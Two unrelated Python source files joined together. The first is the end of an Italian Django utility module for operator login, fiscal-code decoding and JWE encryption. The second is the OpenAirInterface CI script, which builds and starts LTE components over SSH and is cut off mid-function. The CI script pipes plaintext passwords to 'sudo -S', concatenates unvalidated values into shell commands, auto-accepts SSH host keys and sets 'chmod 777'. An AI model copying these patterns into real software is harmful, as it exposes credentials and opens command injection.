LOG.warning("{} - Credenziali errate".format(username), extra=set_client_ip(request))
user.save()
return StatusCode.ERROR.value
except Exception as e:
LOG.warning('[{}] eccezione durante la verifica della password: {}'.format(username, e),
extra=set_client_ip(request))
return StatusCode.EXC.value
return StatusCode.NOT_FOUND.value
def is_admin(username):
"""
Verifica se l'operatore ha il ruolo "ADMIN" ed è attivo
:param username: email/username dell'operatore
:return: True/False
"""
user = Operator.objects.filter(fiscalNumber=username, idRole__role=RoleTag.ADMIN.value, status=True).last()
if user:
return True
else:
return False
def display_alert(alert_type, body_message, link_message=None, link=None):
"""
Genera un messaggio di errore/successo
:param alert_type: enum AlertType: info, warning, success o danger
:param body_message: testo del messaggio da mostrare
:param link_message:
:param link:
:return: lista di dict con campi 'tags' e 'body'
"""
return [{'tags': alert_type.value, 'body': body_message, 'link_message': link_message, 'link': link}]
def get_certificate(crt):
"""
Converte in stringa il certificato in input
:param crt: certificato
:return: stringa convertita
"""
try:
cert = ''
for chunk in crt.chunks():
cert = cert + chunk.decode('UTF-8')
return cert
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip())
return
def get_city_id(municipality_value, bith_date):
"""
Riceve in input il codice catastale del comune di nascita e la data di nascita, dai quali risalire alla
città di nascita
:param municipality_value: codice catastale del comune di nascita
:param bith_date: data di nascita in formato YYYY-mm-dd
:return: StatusCode e sigla della città di nascita
"""
try:
municipality = AddressMunicipality.objects.filter(code=municipality_value, dateStart__lt=bith_date,
dateEnd__gt=bith_date).first()
if municipality is not None:
city = municipality.city
return StatusCode.OK.value, city.code
return StatusCode.ERROR.value, None
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip())
return StatusCode.EXC.value, None
def decode_fiscal_number(request):
"""
Estrae i dati a partire dal codice fiscale
:return: JsonResponse con statusCode e dati (in caso di successo)
"""
cf = request.GET.get('CF').upper()
try:
isvalid = codicefiscale.is_valid(cf) or codicefiscale.is_omocode(cf)
decode_cf = codicefiscale.decode(cf)
if isvalid:
am = AddressMunicipality.objects.filter(code__iexact=decode_cf['birthplace']['code']).first()
if am:
nation_code = 'Z000'
else:
nation_code = decode_cf['birthplace']['code']
return JsonResponse({'statusCode': StatusCode.OK.value,
'codeOfNation': nation_code,
'placeOfBirth': '',
'countyOfBirth': '',
'dateOfBirth': decode_cf['birthdate'].strftime('%d/%m/%Y'),
'gender': decode_cf['sex']
})
StatusCode_city, city = get_city_id(decode_cf['birthplace']['code'], decode_cf['birthdate'].strftime('%Y-%m-%d'))
if StatusCode_city == 200:
return JsonResponse({'statusCode': StatusCode.OK.value,
'codeOfNation': nation_code,
'placeOfBirth': decode_cf['birthplace']['code'],
'countyOfBirth': city,
'dateOfBirth': decode_cf['birthdate'].strftime('%d/%m/%Y'),
'gender': decode_cf['sex']
})
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip(request))
return JsonResponse({'statusCode': StatusCode.EXC.value})
return JsonResponse({'statusCode': StatusCode.ERROR.value})
def format_id_card_issuer(id_card_issuer):
"""
Rimuove le preposizioni dall'ente di rilascio del documento
:param id_card_issuer: comune/nome ente di rilascio
:return: stringa con preposizioni rimosse
"""
exclusions = ['di', 'delle', 'e', 'a', 'con', 'da', 'su', 'tra', 'fra']
exclusions = '|'.join(['\\b%s\\b' % x for x in exclusions])
id_card_issuer = re.sub(exclusions, '', id_card_issuer)
id_card_issuer = id_card_issuer.replace('dell\'', '').replace('d\'', '')
id_card_issuer = re.sub('\s+', '', id_card_issuer)
return id_card_issuer[0].lower() + id_card_issuer[1:]
def encrypt_data(payload, passphrase):
"""
Crypta un payload in ingresso utilizzando la passphrase inserita
:param payload: oggetto da cryptare
:param passphrase: password da utilizzare per l'encrypt
:return: payload cryptato
"""
try:
if type(passphrase) == bytes:
hash_passphrase = hashlib.sha512(passphrase).digest()
else:
hash_passphrase = hashlib.sha512(passphrase.encode()).digest()
key_base64 = base64.urlsafe_b64encode(hash_passphrase)
kjs = json.dumps({'k': key_base64.decode('utf-8', 'strict'), 'kty': 'oct'})
key = jwk.JWK.from_json(kjs)
token = jwe.JWE(payload, json_encode({"alg": "dir", "enc": "A256CBC-HS512"}))
token.add_recipient(key)
return token.serialize(compact=True)
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip())
return None
def decrypt_data(encrypted_data, passphrase):
"""
Decrypta un payload in ingresso utilizzando la passphrase inserita
:param encrypted_data: payload cryptato da decryptare
:param passphrase: password da utilizzare per il decrypt
:return: payload decryptato
"""
try:
if type(passphrase) == bytes:
hash_passphrase = hashlib.sha512(passphrase).digest()
else:
hash_passphrase = hashlib.sha512(passphrase.encode()).digest()
key_base64 = base64.urlsafe_b64encode(hash_passphrase)
kjs = json.dumps({'k': key_base64.decode('utf-8', 'strict'), 'kty': 'oct'})
key = jwk.JWK.from_json(kjs)
jwetoken = jwe.JWE()
jwetoken.deserialize(encrypted_data, key=key)
return jwetoken.payload.decode()
except Exception as e:
LOG.error("Exception: {}".format(str(e)), extra=set_client_ip())
return None
def do_import(task_id, request):
"""
Task in background eseguito per effettuare l'import dei dati
"""
from agency.utils.utils_setup import init_nation, init_prefix, init_county, init_municipality, init_user
task = SetupTask.objects.get(pk=task_id)
try:
init_nation(None)
task.percentage = 15
task.save()
init_prefix(None)
task.percentage = 33
task.save()
init_county(None)
task.percentage = 66
task.save()
init_municipality(None)
task.percentage = 99
task.save()
init_user(request)
task.status = 'completed'
task.percentage = 100
task.save()
except Exception as e:
task.status = 'failed'
task.error = str(e)
task.save()
def check_import(request):
"""
Verifica lo stato di completamento del task in background
"""
task = SetupTask.objects.first()
if task.status == 'completed':
LOG.info("Setup completato con successo.", extra=set_client_ip(request))
elif task.status == 'failed':
LOG.error("Errore durante il caricamento dati.", extra=set_client_ip(request))
return JsonResponse({
'statusCode': StatusCode.OK.value,
'status': task.status,
'percentage': task.percentage,
'error': task.error
})
def start_import(request):
"""
Avvia il processo di setup dei dati in background
"""
if SetupTask.objects.count() == 0:
task = SetupTask()
task.status = 'in_progress'
task.percentage = 0
task.error = ''
task.save()
t = threading.Thread(target=do_import, args=[task.id, request])
t.setDaemon(True)
t.start()
return JsonResponse({'statusCode': StatusCode.OK.value})
else:
last_row = SetupTask.objects.last()
if last_row.status == "failed":
last_row.delete()
return start_import(request)
return JsonResponse({'statusCode': StatusCode.OK.value})
|
main.py
|
# /*
# * Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
# * contributor license agreements. See the NOTICE file distributed with
# * this work for additional information regarding copyright ownership.
# * The OpenAirInterface Software Alliance licenses this file to You under
# * the OAI Public License, Version 1.1 (the "License"); you may not use this file
# * except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.openairinterface.org/?page_id=698
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# *-------------------------------------------------------------------------------
# * For more information about the OpenAirInterface (OAI) Software Alliance:
# * contact@openairinterface.org
# */
#---------------------------------------------------------------------
# Python for CI of OAI-eNB + COTS-UE
#
# Required Python Version
# Python 3.x
#
# Required Python Package
# pexpect
#---------------------------------------------------------------------
#-----------------------------------------------------------
# Version
#-----------------------------------------------------------
Version = '0.1'
#-----------------------------------------------------------
# Constants
#-----------------------------------------------------------
ALL_PROCESSES_OK = 0
ENB_PROCESS_FAILED = -1
ENB_PROCESS_OK = +1
ENB_PROCESS_SEG_FAULT = -11
ENB_PROCESS_ASSERTION = -12
ENB_PROCESS_REALTIME_ISSUE = -13
ENB_PROCESS_NOLOGFILE_TO_ANALYZE = -14
ENB_PROCESS_SLAVE_RRU_NOT_SYNCED = -15
HSS_PROCESS_FAILED = -2
HSS_PROCESS_OK = +2
MME_PROCESS_FAILED = -3
MME_PROCESS_OK = +3
SPGW_PROCESS_FAILED = -4
SPGW_PROCESS_OK = +4
UE_IP_ADDRESS_ISSUE = -5
OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE = -20
OAI_UE_PROCESS_COULD_NOT_SYNC = -21
OAI_UE_PROCESS_ASSERTION = -22
OAI_UE_PROCESS_FAILED = -23
OAI_UE_PROCESS_NO_TUNNEL_INTERFACE = -24
OAI_UE_PROCESS_OK = +6
UE_STATUS_DETACHED = 0
UE_STATUS_DETACHING = 1
UE_STATUS_ATTACHING = 2
UE_STATUS_ATTACHED = 3
X2_HO_REQ_STATE__IDLE = 0
X2_HO_REQ_STATE__TARGET_RECEIVES_REQ = 1
X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE = 2
X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ = 3
X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK = 10
#-----------------------------------------------------------
# Import
#-----------------------------------------------------------
import sys # arg
import re # reg
import pexpect # pexpect
import time # sleep
import os
import subprocess
import xml.etree.ElementTree as ET
import logging
import datetime
import signal
from multiprocessing import Process, Lock, SimpleQueue
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(name)s:%(levelname)s: %(message)s"
)
#-----------------------------------------------------------
# Class Declaration
#-----------------------------------------------------------
class SSHConnection():
def __init__(self):
self.prematureExit = False
self.ranRepository = ''
self.ranBranch = ''
self.ranAllowMerge = False
self.ranCommitID = ''
self.ranTargetBranch = ''
self.eNBIPAddress = ''
self.eNBUserName = ''
self.eNBPassword = ''
self.eNBSourceCodePath = ''
self.EPCIPAddress = ''
self.EPCUserName = ''
self.EPCPassword = ''
self.eNB1IPAddress = ''
self.eNB1UserName = ''
self.eNB1Password = ''
self.eNB1SourceCodePath = ''
self.eNB2IPAddress = ''
self.eNB2UserName = ''
self.eNB2Password = ''
self.eNB2SourceCodePath = ''
self.EPCSourceCodePath = ''
self.EPCType = ''
self.EPC_PcapFileName = ''
self.ADBIPAddress = ''
self.ADBUserName = ''
self.ADBPassword = ''
self.testCase_id = ''
self.testXMLfiles = []
self.nbTestXMLfiles = 0
self.desc = ''
self.Build_eNB_args = ''
self.backgroundBuild = False
self.backgroundBuildTestId = ['', '', '']
self.Initialize_eNB_args = ''
self.eNB_instance = ''
self.eNB_serverId = ''
self.eNBLogFiles = ['', '', '']
self.eNBOptions = ['', '', '']
self.ping_args = ''
self.ping_packetloss_threshold = ''
self.iperf_args = ''
self.iperf_packetloss_threshold = ''
self.iperf_profile = ''
self.nbMaxUEtoAttach = -1
self.UEDevices = []
self.UEDevicesStatus = []
self.CatMDevices = []
self.UEIPAddresses = []
self.htmlFile = ''
self.htmlHeaderCreated = False
self.htmlFooterCreated = False
self.htmlUEConnected = -1
self.htmleNBFailureMsg = ''
self.htmlUEFailureMsg = ''
self.picocom_closure = False
self.idle_sleep_time = 0
self.x2_ho_options = 'network'
self.x2NbENBs = 0
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.htmlTabRefs = []
self.htmlTabNames = []
self.htmlTabIcons = []
self.repeatCounts = []
self.finalStatus = False
self.OsVersion = ''
self.KernelVersion = ''
self.UhdVersion = ''
self.UsrpBoard = ''
self.CpuNb = ''
self.CpuModel = ''
self.CpuMHz = ''
self.UEIPAddress = ''
self.UEUserName = ''
self.UEPassword = ''
self.UE_instance = ''
self.UESourceCodePath = ''
self.UELogFile = ''
self.Build_OAI_UE_args = ''
self.Initialize_OAI_UE_args = ''
self.flexranCtrlInstalled = False
self.flexranCtrlStarted = False
self.expectedNbOfConnectedUEs = 0
def open(self, ipaddress, username, password):
count = 0
connect_status = False
while count < 4:
self.ssh = pexpect.spawn('ssh', [username + '@' + ipaddress], timeout = 5)
self.sshresponse = self.ssh.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', 'Last login', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
self.ssh.sendline('yes')
self.ssh.expect('password:')
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 1:
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 2:
# Checking if we are really on the remote client defined by its IP address
self.command('stdbuf -o0 ifconfig | egrep --color=never "inet addr:"', '\$', 5)
result = re.search(str(ipaddress), str(self.ssh.before))
if result is None:
self.close()
else:
count = 10
connect_status = True
else:
# debug output
logging.debug(str(self.ssh.before))
logging.debug('self.sshresponse = ' + str(self.sshresponse))
# adding a tempo when failure
if not connect_status:
time.sleep(1)
count += 1
if connect_status:
pass
else:
sys.exit('SSH Connection Failed')
def command(self, commandline, expectedline, timeout):
logging.debug(commandline)
self.ssh.timeout = timeout
self.ssh.sendline(commandline)
self.sshresponse = self.ssh.expect([expectedline, pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
return 0
elif self.sshresponse == 1:
logging.debug('\u001B[1;37;41m Unexpected EOF \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
elif self.sshresponse == 2:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
result = re.search('ping |iperf |picocom', str(commandline))
if result is None:
logging.debug(str(self.ssh.before))
sys.exit(self.sshresponse)
else:
return -1
else:
logging.debug('\u001B[1;37;41m Unexpected Others \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
def close(self):
self.ssh.timeout = 5
self.ssh.sendline('exit')
self.sshresponse = self.ssh.expect([pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
pass
elif self.sshresponse == 1:
if not self.picocom_closure:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT during closing\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Unexpected Others during closing\u001B[0m')
def copyin(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination)
while count < 10:
scp_spawn = pexpect.spawn('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# adding a tempo when failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
return 0
else:
return -1
def copyout(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination)
while count < 4:
scp_spawn = pexpect.spawn('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# adding a tempo when failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
pass
else:
sys.exit('SCP failed')
def BuildeNB(self):
if self.ranRepository == '' or self.ranBranch == '' or self.ranCommitID == '':
Usage()
sys.exit('Insufficient Parameter')
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
self.command('mkdir -p ' + lSourcePath, '\$', 5)
self.command('cd ' + lSourcePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.ranRepository + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
# Raphael: here add a check if git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
# Checking the BUILD INFO file
if not self.backgroundBuild:
self.command('ls *.txt', '\$', 5)
result = re.search('LAST_BUILD_INFO', str(self.ssh.before))
if result is not None:
mismatch = False
self.command('grep SRC_COMMIT LAST_BUILD_INFO.txt', '\$', 2)
result = re.search(self.ranCommitID, str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep MERGED_W_TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
result = re.search('YES', str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
result = re.search('develop', str(self.ssh.before))
else:
result = re.search(self.ranTargetBranch, str(self.ssh.before))
if result is None:
mismatch = True
else:
result = re.search('NO', str(self.ssh.before))
if result is None:
mismatch = True
if not mismatch:
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
return
self.command('echo ' + lPassWord + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.ranCommitID != '':
self.command('git checkout -f ' + self.ranCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already been checked earlier
if (self.ranAllowMerge):
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
self.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to remove in log (git clean did the trick)
if self.backgroundBuild:
self.command('echo "./build_oai ' + self.Build_eNB_args + '" > ./my-lte-softmodem-build.sh', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-build.sh', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S -E daemon --inherit --unsafe --name=build_enb_daemon --chdir=' + lSourcePath + '/cmake_targets -o ' + lSourcePath + '/cmake_targets/compile_oai_enb.log ./my-lte-softmodem-build.sh', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
self.backgroundBuildTestId[int(self.eNB_instance)] = self.testCase_id
return
self.command('stdbuf -o0 ./build_oai ' + self.Build_eNB_args + ' 2>&1 | stdbuf -o0 tee compile_oai_enb.log', 'Bypassing the Tests|build have failed', 1500)
self.checkBuildeNB(lIpAddr, lUserName, lPassWord, lSourcePath, self.testCase_id)
def WaitBuildeNBisFinished(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
count = 40
buildOAIprocess = True
while (count > 0) and buildOAIprocess:
self.command('ps aux | grep --color=never build_ | grep -v grep', '\$', 3)
result = re.search('build_oai', str(self.ssh.before))
if result is None:
buildOAIprocess = False
else:
count -= 1
time.sleep(30)
self.checkBuildeNB(lIpAddr, lUserName, lPassWord, lSourcePath, self.backgroundBuildTestId[int(self.eNB_instance)])
def checkBuildeNB(self, lIpAddr, lUserName, lPassWord, lSourcePath, testcaseId):
self.command('cd ' + lSourcePath + '/cmake_targets', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
buildStatus = True
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
buildStatus = False
else:
# Generating a BUILD INFO file
self.command('echo "SRC_BRANCH: ' + self.ranBranch + '" > ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('echo "SRC_COMMIT: ' + self.ranCommitID + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
self.command('echo "MERGED_W_TGT_BRANCH: YES" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
self.command('echo "TGT_BRANCH: develop" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "TGT_BRANCH: ' + self.ranTargetBranch + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "MERGED_W_TGT_BRANCH: NO" >> ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('mkdir -p build_log_' + testcaseId, '\$', 5)
self.command('mv log/* ' + 'build_log_' + testcaseId, '\$', 5)
self.command('mv compile_oai_enb.log ' + 'build_log_' + testcaseId, '\$', 5)
if self.eNB_serverId != '0':
self.command('cd cmake_targets', '\$', 5)
self.command('if [ -e tmp_build' + testcaseId + '.zip ]; then rm -f tmp_build' + testcaseId + '.zip; fi', '\$', 5)
self.command('zip -r -qq tmp_build' + testcaseId + '.zip build_log_' + testcaseId, '\$', 5)
self.close()
if (os.path.isfile('./tmp_build' + testcaseId + '.zip')):
os.remove('./tmp_build' + testcaseId + '.zip')
self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/tmp_build' + testcaseId + '.zip', '.')
if (os.path.isfile('./tmp_build' + testcaseId + '.zip')):
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, './tmp_build' + testcaseId + '.zip', self.eNBSourceCodePath + '/cmake_targets/.')
os.remove('./tmp_build' + testcaseId + '.zip')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets', '\$', 5)
self.command('unzip -qq -DD tmp_build' + testcaseId + '.zip', '\$', 5)
self.command('rm -f tmp_build' + testcaseId + '.zip', '\$', 5)
self.close()
else:
self.close()
if buildStatus:
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
else:
logging.error('\u001B[1m Building OAI eNB Failed\u001B[0m')
self.CreateHtmlTestRow(self.Build_eNB_args, 'KO', ALL_PROCESSES_OK)
self.CreateHtmlTabFooter(False)
sys.exit(1)
def BuildOAIUE(self):
if self.UEIPAddress == '' or self.ranRepository == '' or self.ranBranch == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('mkdir -p ' + self.UESourceCodePath, '\$', 5)
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.ranRepository + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
# here add a check if git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.ranCommitID != '':
self.command('git checkout -f ' + self.ranCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already been checked earlier
if (self.ranAllowMerge):
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
self.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to remove in log (git clean did the trick)
self.command('stdbuf -o0 ./build_oai ' + self.Build_OAI_UE_args + ' 2>&1 | stdbuf -o0 tee compile_oai_ue.log', 'Bypassing the Tests|build have failed', 600)
self.command('ls lte_build_oai/build', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
buildStatus = True
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is None:
buildStatus = False
self.command('mkdir -p build_log_' + self.testCase_id, '\$', 5)
self.command('mv log/* ' + 'build_log_' + self.testCase_id, '\$', 5)
self.command('mv compile_oai_ue.log ' + 'build_log_' + self.testCase_id, '\$', 5)
self.close()
if buildStatus:
self.CreateHtmlTestRow(self.Build_OAI_UE_args, 'OK', ALL_PROCESSES_OK, 'OAI UE')
else:
logging.error('\u001B[1m Building OAI UE Failed\u001B[0m')
self.CreateHtmlTestRow(self.Build_OAI_UE_args, 'KO', ALL_PROCESSES_OK, 'OAI UE')
self.CreateHtmlTabFooter(False)
sys.exit(1)
def InitializeHSS(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS')
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_hss 2>&1 | stdbuf -o0 awk \'{ print strftime("[%Y/%m/%d %H:%M:%S] ",systime()) $0 }\' | stdbuf -o0 tee -a hss_' + self.testCase_id + '.log &', 'Core state: 2 -> 3', 35)
else:
logging.debug('Using the ltebox simulated HSS')
self.command('if [ -d ' + self.EPCSourceCodePath + '/scripts ]; then echo ' + self.eNBPassword + ' | sudo -S rm -Rf ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('mkdir -p ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('cd /opt/hss_sim0609', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f hss.log daemon.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "Starting sudo session" && sudo daemon --unsafe --name=simulated_hss --chdir=/opt/hss_sim0609 ./starthss_real ', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeMME(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('stdbuf -o0 hostname', '\$', 5)
result = re.search('hostname\\\\r\\\\n(?P<host_name>[a-zA-Z0-9\-\_]+)\\\\r\\\\n', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m Hostname Not Found! \u001B[0m')
sys.exit(1)
host_name = result.group('host_name')
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_mme 2>&1 | stdbuf -o0 tee -a mme_' + self.testCase_id + '.log &', 'MME app initialization complete', 100)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_mme', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeSPGW(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
